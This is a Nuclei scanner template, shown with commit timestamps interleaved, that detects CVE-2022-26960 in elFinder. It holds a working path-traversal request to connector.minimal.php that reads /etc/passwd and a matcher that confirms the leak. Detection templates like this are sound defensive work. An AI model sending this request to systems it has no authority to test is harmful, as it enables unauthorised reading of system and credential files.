nuclei-templates/http/cves/2022/CVE-2022-26960.yaml

50 lines
2.0 KiB
YAML
Raw Normal View History

2022-06-30 23:31:46 +00:00
id: CVE-2022-26960
info:
name: elFinder <=2.1.60 - Local File Inclusion
2022-06-30 23:31:46 +00:00
author: pikpikcu
severity: critical
2022-06-30 23:31:46 +00:00
description: |
elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability.
2022-06-30 23:31:46 +00:00
reference:
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
- https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
- https://www.synacktiv.com/publications.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2022-26960
cwe-id: CWE-22
2024-05-31 19:23:20 +00:00
epss-score: 0.84507
epss-percentile: 0.98501
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
2022-07-04 12:32:11 +00:00
metadata:
2022-07-06 09:08:13 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: std42
product: elfinder
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,lfi,elfinder,std42
2022-06-30 23:31:46 +00:00
http:
2022-06-30 23:31:46 +00:00
- raw:
- |
2022-07-04 12:32:11 +00:00
GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
2022-06-30 23:31:46 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2022-07-04 12:32:11 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022026f3102461fdfb8ad42d0fffcee676354eaeeabe665e8b6057eac540c0f72518022100b5dfbce7dde7ac93f7894809911d03705c9e3046a2ee41a85a93a23fc8fc38fb:922c64590222798bb761d5b6d8e72950